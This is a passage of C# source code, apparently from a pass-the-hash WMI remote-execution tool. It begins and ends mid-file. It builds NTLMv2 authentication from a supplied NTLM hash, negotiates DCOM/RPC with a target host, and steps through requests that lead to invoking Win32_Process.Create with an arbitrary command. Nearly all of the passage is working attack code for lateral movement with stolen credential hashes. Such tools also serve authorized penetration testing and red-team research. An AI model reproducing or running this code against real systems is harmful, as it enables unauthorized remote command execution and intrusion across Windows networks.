| output.AppendLine(String.Format("Random port extraction failure")); 416 | Console.WriteLine(output.ToString()); 417 | Environment.Exit(0); 418 | } 419 | } 420 | else 421 | { 422 | output.AppendLine("An Unkonwn Error Occured"); 423 | Console.WriteLine(output.ToString()); 424 | Environment.Exit(0); 425 | } 426 | 427 | if (WMI_Client_Random_Port.Connected) 428 | { 429 | if (debugging) { output.AppendLine(String.Format("Connected to: {0} using port {1}", Target_Long, WMI_Random_Port_Int)); } 430 | NetworkStream WMI_Client_Random_Port_Stream = WMI_Client_Random_Port.GetStream(); 431 | Packet_RPC = WMIExec.RPCBind(2, new byte[] { 0xd0, 0x16 }, new byte[] { 0x03 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }, new byte[] { 0x00, 0x00 }); 432 | Packet_RPC["RPCBind_FragLength"] = new byte[] { 0xd0, 0x00 }; 433 | Packet_RPC["RPCBind_AuthLength"] = new byte[] { 0x28, 0x00 }; 434 | Packet_RPC["RPCBind_NegotiateFlags"] = new byte[] { 0x97, 0x82, 0x08, 0xa2 }; 435 | WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC); 436 | WMI_Client_Receive = Utilities.SendStream(WMI_Client_Random_Port_Stream, WMI_Client_Send); 437 | Assoc_Group = Utilities.GetByteRange(WMI_Client_Receive, 20, 23); 438 | WMI_NTLMSSP = BitConverter.ToString(WMI_Client_Receive).Replace("-", ""); 439 | WMI_NTLMSSP_index = WMI_NTLMSSP.IndexOf("4E544C4D53535000"); 440 | WMI_NTLMSSP_bytes_index = WMI_NTLMSSP_index / 2; 441 | WMI_Domain_Length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 12, WMI_Client_Receive); 442 | WMI_target_Length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 40, WMI_Client_Receive); 443 | WMI_NTLM_Challenge = Utilities.GetByteRange(WMI_Client_Receive, WMI_NTLMSSP_bytes_index + 24, WMI_NTLMSSP_bytes_index + 31); 444 | WMI_Target_Details = Utilities.GetByteRange(WMI_Client_Receive, WMI_NTLMSSP_bytes_index + 56 + WMI_Domain_Length, WMI_NTLMSSP_bytes_index + 55 + WMI_Domain_Length + WMI_target_Length); 445 | WMI_Target_Time_Bytes = Utilities.GetByteRange(WMI_Target_Details, WMI_Target_Details.Length - 12, WMI_Target_Details.Length - 5); 446 | sb = new StringBuilder(); 447 | for (int i = 0; i < hash.Length - 1; i += 2) { sb.Append(hash.Substring(i, 2) + "-"); }; 448 | NTLM_hash_bytes = (Utilities.ConvertStringToByteArray(hash.Replace("-", ""))); 449 | Auth_Hostname = Environment.MachineName; 450 | Auth_Hostname_Bytes = Encoding.Unicode.GetBytes(Auth_Hostname); 451 | Auth_Domain_Bytes = Encoding.Unicode.GetBytes(domain); 452 | Auth_Username_Bytes = Encoding.Unicode.GetBytes(username); 453 | Auth_Domain_Length = BitConverter.GetBytes(Auth_Domain_Bytes.Length); 454 | Auth_Domain_Length = new byte[] { Auth_Domain_Length[0], Auth_Domain_Length[1] }; 455 | Auth_Username_Length = BitConverter.GetBytes(Auth_Username_Bytes.Length); 456 | Auth_Username_Length = new byte[] { Auth_Username_Length[0], Auth_Username_Length[1] }; 457 | Auth_Hostname_Length = BitConverter.GetBytes(Auth_Hostname_Bytes.Length); 458 | Auth_Hostname_Length = new byte[] { Auth_Hostname_Length[0], Auth_Hostname_Length[1] }; 459 | Auth_Domain_offset = new byte[] { 0x40, 0x00, 0x00, 0x00 }; 460 | Auth_Username_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + 64); 461 | Auth_Hostname_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + 64); 462 | Auth_LM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 64); 463 | Auth_NTLM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 88); 464 | HMAC_MD5 = new HMACMD5(); 465 | HMAC_MD5.Key = NTLM_hash_bytes; 466 | Username_And_Target = username.ToUpper(); 467 | Username_Bytes = Encoding.Unicode.GetBytes(Username_And_Target); 468 | Username_And_Target_bytes = Username_Bytes.Concat(Auth_Domain_Bytes).ToArray(); 469 | NTLMv2_hash = HMAC_MD5.ComputeHash(Username_And_Target_bytes); 470 | r = new Random(); 471 | Client_Challenge_Bytes = new byte[8]; 472 | r.NextBytes(Client_Challenge_Bytes); 473 | 474 | Security_Blob_Bytes = (new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }) 475 | .Concat(WMI_Target_Time_Bytes) 476 | .Concat(Client_Challenge_Bytes) 477 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }) 478 | .Concat(WMI_Target_Details) 479 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray(); 480 | 481 | Server_Challenge_And_Security_Blob_Bytes = WMI_NTLM_Challenge.Concat(Security_Blob_Bytes).ToArray(); 482 | HMAC_MD5.Key = NTLMv2_hash; 483 | NTLMv2_Response = HMAC_MD5.ComputeHash(Server_Challenge_And_Security_Blob_Bytes); 484 | Session_Base_Key = HMAC_MD5.ComputeHash(NTLMv2_Response); 485 | byte[] Clignt_Signing_Constant = new byte[] { 0x73, 0x65, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x20, 0x6b, 0x65, 0x79, 0x20, 0x74, 0x6f, 0x20, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x2d, 0x74, 0x6f, 0x2d, 0x73, 0x65, 0x72, 0x76, 0x65, 0x72, 0x20, 0x73, 0x69, 0x67, 0x6e, 0x69, 0x6e, 0x67, 0x20, 0x6b, 0x65, 0x79, 0x20, 0x6d, 0x61, 0x67, 0x69, 0x63, 0x20, 0x63, 0x6f, 0x6e, 0x73, 0x74, 0x61, 0x6e, 0x74, 0x00 }; 486 | MD5CryptoServiceProvider MD5_crypto = new MD5CryptoServiceProvider(); 487 | byte[] Client_Signing_Key = MD5_crypto.ComputeHash(Session_Base_Key.Concat(Clignt_Signing_Constant).ToArray()); 488 | NTLMv2_Response = NTLMv2_Response.Concat(Security_Blob_Bytes).ToArray(); 489 | NTLMv2_Response_Length = BitConverter.GetBytes(NTLMv2_Response.Length); 490 | NTLMv2_Response_Length = new byte[] { NTLMv2_Response_Length[0], NTLMv2_Response_Length[1] }; 491 | WMI_Session_Key_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + NTLMv2_Response.Length + 88); 492 | WMI_Session_Key_Length = new byte[] { 0x00, 0x00 }; 493 | WMI_Negotiate_Flags = new byte[] { 0x15, 0x82, 0x88, 0xa2 }; 494 | NTLMSSP_response = (new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 }) 495 | .Concat(Auth_LM_Offset) 496 | .Concat(NTLMv2_Response_Length) 497 | .Concat(NTLMv2_Response_Length) 498 | .Concat(Auth_NTLM_Offset) 499 | .Concat(Auth_Domain_Length) 500 | .Concat(Auth_Domain_Length) 501 | .Concat(Auth_Domain_offset) 502 | .Concat(Auth_Username_Length) 503 | .Concat(Auth_Username_Length) 504 | .Concat(Auth_Username_Offset) 505 | .Concat(Auth_Hostname_Length) 506 | .Concat(Auth_Hostname_Length) 507 | .Concat(Auth_Hostname_Offset) 508 | .Concat(WMI_Session_Key_Length) 509 | .Concat(WMI_Session_Key_Length) 510 | .Concat(WMI_Session_Key_Offset) 511 | .Concat(WMI_Negotiate_Flags) 512 | .Concat(Auth_Domain_Bytes) 513 | .Concat(Auth_Username_Bytes) 514 | .Concat(Auth_Hostname_Bytes) 515 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }) 516 | .Concat(NTLMv2_Response).ToArray(); 517 | 518 | HMAC_MD5.Key = Client_Signing_Key; 519 | Sequence_Number = new byte[] { 0x00, 0x00, 0x00, 0x00 }; 520 | Packet_RPC = WMIExec.RPCAuth3(NTLMSSP_response); 521 | Packet_RPC["RPCAUTH3_CallID"] = new byte[] { 0x02, 0x00, 0x00, 0x00 }; 522 | Packet_RPC["RPCAUTH3_AuthLevel"] = new byte[] { 0x04 }; 523 | WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC); 524 | WMI_Client_Random_Port_Stream.Write(WMI_Client_Send, 0, WMI_Client_Send.Length); 525 | WMI_Client_Random_Port_Stream.Flush(); 526 | 527 | Packet_RPC = WMIExec.RPCRequest(new byte[] { 0x83 }, 76, 16, 4, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x03, 0x00 }, Object_UUID); 528 | OrderedDictionary Packet_Rem_Query_Interface = WMIExec.DCOMRemQueryInterface(Causality_ID_Bytes, IPID, new byte[] { 0xd6, 0x1c, 0x78, 0xd4, 0xd3, 0xe5, 0xdf, 0x44, 0xad, 0x94, 0x93, 0x0e, 0xfe, 0x48, 0xa8, 0x87 }); 529 | OrderedDictionary Packet_NTLMSSP_Verifier = WMIExec.NTLMSSPVerifier(4, new byte[] { 0x04 }, Sequence_Number); 530 | byte[] Rem_Query_Interface = Utilities.ConvertFromPacketOrderedDictionary(Packet_Rem_Query_Interface); 531 | byte[] NTLMSSP_Verifier = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Verifier); 532 | HMAC_MD5.Key = Client_Signing_Key; 533 | byte[] RPC_Sign = Sequence_Number.Concat(Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC)) 534 | .Concat(Rem_Query_Interface) 535 | .Concat(Utilities.GetByteRange(NTLMSSP_Verifier, 0, 11)).ToArray(); 536 | 537 | byte[] RPC_Signature = HMAC_MD5.ComputeHash(RPC_Sign); 538 | RPC_Signature = Utilities.GetByteRange(RPC_Signature, 0, 7); 539 | Packet_NTLMSSP_Verifier["NTLMSSPVerifier_NTLMSSPVerifierChecksum"] = RPC_Signature; 540 | NTLMSSP_Verifier = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Verifier); 541 | 542 | WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC) 543 | .Concat(Rem_Query_Interface) 544 | .Concat(NTLMSSP_Verifier).ToArray(); 545 | 546 | WMI_Client_Receive = Utilities.SendStream(WMI_Client_Random_Port_Stream, WMI_Client_Send); 547 | 548 | if (WMI_Client_Receive[2] == 3 && BitConverter.ToString(Utilities.GetByteRange(WMI_Client_Receive, 24, 27)) == "05-00-00-00") 549 | { 550 | output.AppendLine(String.Format("{0} WMI access denied on {1}", Output_Username, Target_Long)); 551 | Console.WriteLine(output.ToString()); 552 | Environment.Exit(0); 553 | } 554 | else if (WMI_Client_Receive[2] == 3 && BitConverter.ToString(Utilities.GetByteRange(WMI_Client_Receive, 24, 27)) != "05-00-00-00") 555 | { 556 | string Error_Code = BitConverter.ToString(new byte[] { WMI_Client_Receive[27], WMI_Client_Receive[26], WMI_Client_Receive[25], WMI_Client_Receive[24] }); 557 | string[] Error_Code_Array = Error_Code.Split('-'); 558 | Error_Code = string.Join("", Error_Code_Array); 559 | output.AppendLine(String.Format("Error Code: 0x{0}", Error_Code.ToString())); 560 | Console.WriteLine(output.ToString()); 561 | Environment.Exit(0); 562 | } 563 | else if (WMI_Client_Receive[2] == 2) 564 | { 565 | WMI_Data = BitConverter.ToString(WMI_Client_Receive).Replace("-", ""); 566 | OXID_Index = WMI_Data.IndexOf(OXID); 567 | OXID_Bytes_Index = OXID_Index / 2; 568 | Object_UUID2 = Utilities.GetByteRange(WMI_Client_Receive, OXID_Bytes_Index + 16, OXID_Bytes_Index + 31); 569 | WMI_Client_Stage = "AlterContext"; 570 | } 571 | else 572 | { 573 | output.AppendLine("An Unkonwn Error Occured"); 574 | Console.WriteLine(output.ToString()); 575 | Environment.Exit(0); 576 | } 577 | 578 | //Moving on to Command Execution 579 | int Request_Split_Index = 5500; 580 | string WMI_Client_Stage_Next = ""; 581 | bool Request_Split = false; 582 | 583 | while (WMI_Client_Stage != "exit") 584 | { 585 | if (debugging) { output.AppendLine(WMI_Client_Stage); } 586 | if (WMI_Client_Receive[2] == 3) 587 | { 588 | string Error_Code = BitConverter.ToString(new byte[] { WMI_Client_Receive[27], WMI_Client_Receive[26], WMI_Client_Receive[25], WMI_Client_Receive[24] }); 589 | string[] Error_Code_Array = Error_Code.Split('-'); 590 | Error_Code = string.Join("", Error_Code_Array); 591 | output.AppendLine(String.Format("Execution failed with error code: 0x{0}", Error_Code.ToString())); 592 | WMI_Client_Stage = "exit"; 593 | } 594 | 595 | switch (WMI_Client_Stage) 596 | { 597 | case "AlterContext": 598 | { 599 | switch (Sequence_Number[0]) 600 | { 601 | case 0: 602 | { 603 | Alter_Context_Call_ID = new byte[] { 0x03, 0x00, 0x00, 0x00 }; 604 | Alter_Context_Context_ID = new byte[] { 0x02, 0x00 }; 605 | Alter_Context_UUID = new byte[] { 0xd6, 0x1c, 0x78, 0xd4, 0xd3, 0xe5, 0xdf, 0x44, 0xad, 0x94, 0x93, 0x0e, 0xfe, 0x48, 0xa8, 0x87 }; 606 | WMI_Client_Stage_Next = "Request"; 607 | } 608 | break; 609 | case 1: 610 | { 611 | Alter_Context_Call_ID = new byte[] { 0x04, 0x00, 0x00, 0x00 }; 612 | Alter_Context_Context_ID = new byte[] { 0x03, 0x00 }; 613 | Alter_Context_UUID = new byte[] { 0x18, 0xad, 0x09, 0xf3, 0x6a, 0xd8, 0xd0, 0x11, 0xa0, 0x75, 0x00, 0xc0, 0x4f, 0xb6, 0x88, 0x20 }; 614 | WMI_Client_Stage_Next = "Request"; 615 | } 616 | break; 617 | case 6: 618 | { 619 | Alter_Context_Call_ID = new byte[] { 0x09, 0x00, 0x00, 0x00 }; 620 | Alter_Context_Context_ID = new byte[] { 0x04, 0x00 }; 621 | Alter_Context_UUID = new byte[] { 0x99, 0xdc, 0x56, 0x95, 0x8c, 0x82, 0xcf, 0x11, 0xa3, 0x7e, 0x00, 0xaa, 0x00, 0x32, 0x40, 0xc7 }; 622 | WMI_Client_Stage_Next = "Request"; 623 | } 624 | break; 625 | } 626 | Packet_RPC = WMIExec.RPCAlterContext(Assoc_Group, Alter_Context_Call_ID, Alter_Context_Context_ID, Alter_Context_UUID); 627 | WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC); 628 | WMI_Client_Receive = Utilities.SendStream(WMI_Client_Random_Port_Stream, WMI_Client_Send); 629 | WMI_Client_Stage = WMI_Client_Stage_Next; 630 | } 631 | break; 632 | case "Request": 633 | { 634 | switch (Sequence_Number[0]) 635 | { 636 | case 0: 637 | { 638 | Sequence_Number = new byte[] { 0x01, 0x00, 0x00, 0x00 }; 639 | Request_Flags = new byte[] { 0x83 }; 640 | Request_Auth_Padding = 12; 641 | Request_Call_ID = new byte[] { 0x03, 0x00, 0x00, 0x00 }; 642 | Request_Context_ID = new byte[] { 0x02, 0x00 }; 643 | Request_Opnum = new byte[] { 0x03, 0x00 }; 644 | Request_UUID = Object_UUID2; 645 | Hostname_Length = BitConverter.GetBytes(Auth_Hostname.Length + 1); 646 | WMI_Client_Stage_Next = "AlterContext"; 647 | 648 | if (Convert.ToBoolean(Auth_Hostname.Length % 2)) 649 | { 650 | Auth_Hostname_Bytes = Auth_Hostname_Bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray(); 651 | } 652 | else 653 | { 654 | Auth_Hostname_Bytes = Auth_Hostname_Bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray(); 655 | } 656 | 657 | Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }) 658 | .Concat(Causality_ID_Bytes) 659 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 }) 660 | .Concat(Hostname_Length) 661 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }) 662 | .Concat(Hostname_Length) 663 | .Concat(Auth_Hostname_Bytes) 664 | .Concat(Process_ID_Bytes) 665 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray(); 666 | } 667 | break; 668 | case 1: 669 | { 670 | Sequence_Number = new byte[] { 0x02, 0x00, 0x00, 0x00 }; 671 | Request_Flags = new byte[] { 0x83 }; 672 | Request_Auth_Padding = 8; 673 | Request_Call_ID = new byte[] { 0x04, 0x00, 0x00, 0x00 }; 674 | Request_Context_ID = new byte[] { 0x03, 0x00 }; 675 | Request_Opnum = new byte[] { 0x03, 0x00 }; 676 | Request_UUID = IPID; 677 | WMI_Client_Stage_Next = "Request"; 678 | Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }) 679 | .Concat(Causality_ID_Bytes) 680 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray(); 681 | } 682 | break; 683 | case 2: 684 | { 685 | Sequence_Number = new byte[] { 0x03, 0x00, 0x00, 0x00 }; 686 | Request_Flags = new byte[] { 0x83 }; 687 | Request_Auth_Padding = 0; 688 | Request_Call_ID = new byte[] { 0x05, 0x00, 0x00, 0x00 }; 689 | Request_Context_ID = new byte[] { 0x03, 0x00 }; 690 | Request_Opnum = new byte[] { 0x06, 0x00 }; 691 | Request_UUID = IPID; 692 | WMI_Namespace_Length = BitConverter.GetBytes(Target_Short.Length + 14); 693 | WMI_Namespace_Unicode = Encoding.Unicode.GetBytes("\\\\" + Target_Short + "\\root\\cimv2"); 694 | WMI_Client_Stage_Next = "Request"; 695 | 696 | if (Convert.ToBoolean(Target_Short.Length % 2)) 697 | { 698 | WMI_Namespace_Unicode = WMI_Namespace_Unicode.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray(); 699 | } 700 | else 701 | { 702 | WMI_Namespace_Unicode = WMI_Namespace_Unicode.Concat(new byte[] { 0x00, 0x0 }).ToArray(); 703 | 704 | } 705 | 706 | Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }) 707 | .Concat(Causality_ID_Bytes) 708 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 }) 709 | .Concat(WMI_Namespace_Length) 710 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }) 711 | .Concat(WMI_Namespace_Length) 712 | .Concat(WMI_Namespace_Unicode) 713 | .Concat(new byte[] { 0x04, 0x00, 0x02, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x2d, 0x00, 0x55, 0x00, 0x53, 0x00, 0x2c, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray(); 714 | 715 | } 716 | break; 717 | case 3: 718 | { 719 | Sequence_Number = new byte[] { 0x04, 0x00, 0x00, 0x00 }; 720 | Request_Flags = new byte[] { 0x83 }; 721 | Request_Auth_Padding = 8; 722 | Request_Context_ID = new byte[] { 0x00, 0x00 }; 723 | Request_Call_ID = new byte[] { 0x06, 0x00, 0x00, 0x00 }; 724 | Request_Opnum = new byte[] { 0x05, 0x00 }; 725 | Request_UUID = Object_UUID; 726 | WMI_Client_Stage_Next = "Request"; 727 | WMI_Data = BitConverter.ToString(WMI_Client_Receive).Replace("-", ""); 728 | OXID_Index = WMI_Data.IndexOf(OXID); 729 | OXID_Bytes_Index = OXID_Index / 2; 730 | IPID2 = Utilities.GetByteRange(WMI_Client_Receive, OXID_Bytes_Index + 16, OXID_Bytes_Index + 31); 731 | OrderedDictionary Packet_rem_release = WMIExec.DCOMRemRelease(Causality_ID_Bytes, Object_UUID2, IPID); 732 | Stub_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_rem_release); 733 | } 734 | break; 735 | case 4: 736 | { 737 | Sequence_Number = new byte[] { 0x05, 0x00, 0x00, 0x00 }; 738 | Request_Flags = new byte[] { 0x83 }; 739 | Request_Auth_Padding = 4; 740 | Request_Context_ID = new byte[] { 0x00, 0x00 }; 741 | Request_Call_ID = new byte[] { 0x07, 0x00, 0x00, 0x00 }; 742 | Request_Opnum = new byte[] { 0x03, 0x00 }; 743 | Request_UUID = Object_UUID; 744 | WMI_Client_Stage_Next = "Request"; 745 | Packet_Rem_Query_Interface = WMIExec.DCOMRemQueryInterface(Causality_ID_Bytes, IPID2, new byte[] { 0x9e, 0xc1, 0xfc, 0xc3, 0x70, 0xa9, 0xd2, 0x11, 0x8b, 0x5a, 0x00, 0xa0, 0xc9, 0xb7, 0xc9, 0xc4 }); 746 | Stub_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_Rem_Query_Interface); 747 | 748 | 749 | } 750 | break; 751 | case 5: 752 | { 753 | Sequence_Number = new byte[] { 0x06, 0x00, 0x00, 0x00 }; 754 | Request_Flags = new byte[] { 0x83 }; 755 | Request_Auth_Padding = 4; 756 | Request_Call_ID = new byte[] { 0x08, 0x00, 0x00, 0x00 }; 757 | Request_Context_ID = new byte[] { 0x00, 0x00 }; 758 | Request_Opnum = new byte[] { 0x03, 0x00 }; 759 | Request_UUID = Object_UUID; 760 | WMI_Client_Stage_Next = "AlterContext"; 761 | Packet_Rem_Query_Interface = WMIExec.DCOMRemQueryInterface(Causality_ID_Bytes, IPID2, new byte[] { 0x83, 0xb2, 0x96, 0xb1, 0xb4, 0xba, 0x1a, 0x10, 0xb6, 0x9c, 0x00, 0xaa, 0x00, 0x34, 0x1d, 0x07 }); 762 | Stub_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_Rem_Query_Interface); 763 | } 764 | break; 765 | case 6: 766 | { 767 | Sequence_Number = new byte[] { 0x07, 0x00, 0x00, 0x00 }; 768 | Request_Flags = new byte[] { 0x83 }; 769 | Request_Auth_Padding = 0; 770 | Request_Context_ID = new byte[] { 0x04, 0x00 }; 771 | Request_Call_ID = new byte[] { 0x09, 0x00, 0x00, 0x00 }; 772 | Request_Opnum = new byte[] { 0x06, 0x00 }; 773 | Request_UUID = IPID2; 774 | WMI_Client_Stage_Next = "Request"; 775 | 776 | Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }) 777 | .Concat(Causality_ID_Bytes) 778 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x77, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray(); 779 | } 780 | break; 781 | case 7: 782 | { 783 | Sequence_Number = new byte[] { 0x08, 0x00, 0x00, 0x00 }; 784 | Request_Flags = new byte[] { 0x83 }; 785 | Request_Auth_Padding = 0; 786 | Request_Context_ID = new byte[] { 0x04, 0x00 }; 787 | Request_Call_ID = new byte[] { 0x10, 0x00, 0x00, 0x00 }; 788 | Request_Opnum = new byte[] { 0x06, 0x00 }; 789 | Request_UUID = IPID2; 790 | WMI_Client_Stage_Next = "Request"; 791 | 792 | Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }) 793 | .Concat(Causality_ID_Bytes) 794 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x77, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray(); 795 | } 796 | break; 797 | default: 798 | { 799 | if (Sequence_Number[0] >= 8) 800 | { 801 | Sequence_Number = new byte[] { 0x09, 0x00, 0x00, 0x00 }; 802 | Request_Auth_Padding = 0; 803 | Request_Context_ID = new byte[] { 0x04, 0x00 }; 804 | Request_Call_ID = new byte[] { 0x0b, 0x00, 0x00, 0x00 }; 805 | Request_Opnum = new byte[] { 0x18, 0x00 }; 806 | Request_UUID = IPID2; 807 | byte[] Stub_Length = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 1769), 0, 1); 808 | byte[] Stub_Length2 = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 1727), 0, 1); ; 809 | byte[] Stub_Length3 = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 1713), 0, 1); 810 | byte[] Command_Length = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 93), 0, 1); 811 | byte[] Command_Length2 = Utilities.GetByteRange(BitConverter.GetBytes(command.Length + 16), 0, 1); 812 | byte[] Command_Bytes = Encoding.UTF8.GetBytes(command); 813 | 814 | string Command_Padding_Check = Convert.ToString(Decimal.Divide(command.Length, 4)); 815 | if (Command_Padding_Check.Contains(".75")) 816 | { 817 | Command_Bytes = Command_Bytes.Concat(new byte[] { 0x00 }).ToArray(); 818 | } 819 | else if (Command_Padding_Check.Contains(".5")) 820 | { 821 | Command_Bytes = Command_Bytes.Concat(new byte[] { 0x00, 0x00 }).ToArray(); 822 | } 823 | else if (Command_Padding_Check.Contains(".25")) 824 | { 825 | Command_Bytes = Command_Bytes.Concat(new byte[] { 0x00, 0x00, 0x00 }).ToArray(); 826 | } 827 | else 828 | { 829 | Command_Bytes = Command_Bytes.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray(); 830 | } 831 | 832 | Stub_Data = (new byte[] { 0x05, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }) 833 | .Concat(Causality_ID_Bytes) 834 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x0d, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5f, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x06, 0x00, 0x00, 0x00, 0x0c, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x63, 0x00, 0x72, 0x00, 0x65, 0x00, 0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00 }) 835 | .Concat(Stub_Length) 836 | .Concat(new byte[] { 0x00, 0x00 }) 837 | .Concat(Stub_Length) 838 | .Concat(new byte[] { 0x00, 0x00, 0x4d, 0x45, 0x4f, 0x57, 0x04, 0x00, 0x00, 0x00, 0x81, 0xa6, 0x12, 0xdc, 0x7f, 0x73, 0xcf, 0x11, 0x88, 0x4d, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24, 0x12, 0xf8, 0x90, 0x45, 0x3a, 0x1d, 0xd0, 0x11, 0x89, 0x1f, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24, 0x00, 0x00, 0x00, 0x00 }) 839 | .Concat(Stub_Length2) 840 | .Concat(new byte[] { 0x00, 0x00, 0x78, 0x56, 0x34, 0x12 }) 841 | .Concat(Stub_Length3) 842 | .Concat(new byte[] { 0x00, 0x00, 0x02, 0x53, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x00, 0xff, 0xff, 0x03, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00, 0x00, 0x15, 0x01, 0x00, 0x00, 0x73, 0x01, 0x00, 0x00, 0x76, 0x02, 0x00, 0x00, 